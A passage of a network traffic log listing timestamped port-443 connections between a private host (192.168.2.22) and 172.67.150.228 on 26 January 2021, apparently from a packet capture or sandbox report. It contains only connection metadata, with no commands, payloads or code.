Jan 26, 2021 21:38:14.773320913 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.773340940 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.773344040 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.773344994 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.773354053 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.773365974 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.773370028 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.773397923 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.774215937 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.774219036 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.774240017 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.774255037 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.774261951 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.774283886 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.774290085 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.774307013 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.774307966 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.774327993 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.774331093 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.774350882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.774365902 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.775146008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.775168896 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.775192976 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.775193930 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.775203943 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.775216103 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.775233984 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.775237083 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.775249958 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.775259018 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.775269985 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.775289059 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.776061058 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.776082039 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.776115894 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.776125908 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.777102947 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.785985947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.786010981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.786035061 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.786056042 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.786071062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.786139011 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.786828995 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.811233997 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.811260939 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.811276913 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.811417103 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.817368031 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.817404032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.817420006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.817594051 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.819618940 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.819642067 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.819657087 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.819746971 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.820429087 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.820455074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.820476055 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.820494890 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.820502996 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.820512056 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.820517063 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.820534945 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.820549011 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.828507900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828536034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828557014 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828577042 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828596115 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828615904 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828661919 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.828680992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.828919888 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828946114 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828968048 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.828982115 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.828989029 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.829004049 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.829016924 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.829030991 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.829055071 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.829072952 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.829106092 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.829885006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.829911947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.829933882 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.829955101 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.829967976 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.829979897 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.829981089 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.830003023 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.830018997 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.830033064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.830671072 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.830741882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.830745935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.830768108 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.830790043 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.830805063 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.830811024 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.830827951 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.830846071 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.830848932 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.830857992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.830883980 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.831676006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.831698895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.831721067 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.831732988 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.831743002 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.831753969 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.831757069 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.831799984 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.831801891 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.831825018 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.831839085 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.831855059 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.832487106 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.832510948 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.832531929 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.832545996 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.832554102 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.832561970 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.832566023 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.832576036 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.832596064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.832597971 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.832612038 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.832632065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.833317041 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.833339930 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.833360910 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.833369017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.833393097 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.833395958 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.833399057 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.833416939 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.833429098 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.833439112 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.833446980 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.833472967 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.834192038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.834223986 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.834245920 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.834254980 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.834266901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.834266901 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.834280968 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.834299088 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.842850924 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.842871904 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.842894077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.842916965 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.842932940 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.842994928 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.845276117 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.868320942 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.868355989 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.868372917 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.868515015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.876661062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.876692057 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.876708031 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.876832008 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.884504080 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.884537935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.884558916 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.884578943 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.884602070 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.884624004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.884679079 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.884865999 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.884902954 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.884913921 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.895390034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895422935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895446062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895467043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895488977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895512104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895596027 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.895793915 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895821095 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895836115 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.895842075 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.895848036 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895855904 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.895870924 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895881891 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.895891905 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895899057 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.895914078 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.895929098 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.895945072 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.896632910 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.896656036 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.896677971 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.896698952 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.896712065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.896719933 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.896722078 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.896734953 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.896742105 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.896753073 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.896774054 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.897531033 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.897556067 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.897577047 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.897598028 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.897605896 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.897619963 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.897623062 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.897639990 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.897641897 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.897658110 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.897675037 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.898411989 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.898437977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.898458958 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.898478031 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.898479939 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.898499012 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.898503065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.898504019 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.898514032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.898529053 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.898531914 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.898562908 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.899285078 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.899311066 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.899332047 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.899347067 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.899354935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.899355888 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.899368048 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.899379015 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.899382114 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.899400949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.899413109 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.899429083 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.899588108 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.900191069 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.900218010 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.900239944 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.900248051 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.900262117 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.900268078 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.900274992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.900285006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.900289059 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.900309086 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.900319099 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.900332928 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.901040077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.901067972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.901089907 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.901097059 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.901110888 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.901114941 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.901122093 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.901135921 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.901138067 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.901159048 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.901170015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.901185989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.901946068 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.901971102 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.902003050 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.902015924 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.904833078 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.921852112 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.921891928 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.921905041 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.922063112 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.928092957 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.928122997 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.928139925 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.928173065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.928195000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.953608036 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.953639030 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.953659058 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.953679085 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.953700066 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.953718901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.953792095 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.953988075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.954011917 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.954031944 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.954034090 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.954044104 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.954056978 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.954060078 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.954078913 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.954090118 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.954102993 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.954104900 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.954138041 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.954864979 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.954889059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.954925060 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955004930 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955027103 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955034971 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955048084 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955051899 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955059052 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955086946 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955146074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955188990 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955786943 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955810070 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955832958 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955835104 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955846071 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955857038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955861092 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955878973 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955898046 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955899954 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.955915928 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.955931902 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.956628084 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.956651926 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.956674099 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.956696033 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.956702948 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.956716061 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.956721067 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.956728935 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.956738949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.956759930 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.956768990 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.957458019 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.957482100 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.957504034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.957525015 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.957526922 CET	49167	443	192.168.2.22	172.67.150.228
